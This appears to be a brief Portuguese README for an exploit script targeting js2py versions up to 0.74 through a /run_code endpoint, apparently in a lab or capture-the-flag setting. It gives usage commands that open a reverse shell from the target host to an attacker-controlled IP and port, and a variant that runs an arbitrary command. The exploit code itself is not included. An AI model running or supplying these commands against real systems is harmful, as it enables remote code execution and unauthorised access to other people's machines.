
Payload padrão de reverse shell e argumento de comando opcional permitido
O exploit funciona para js2py <= v0.74
requests (pip install requests)Reverse shell:
python exploit.py 10.129.227.108 /run_code --local_ip 10.10.14.71 --local_port 4444
Comando personalizado:
python exploit.py 10.129.227.108 /run_code --cmd "id"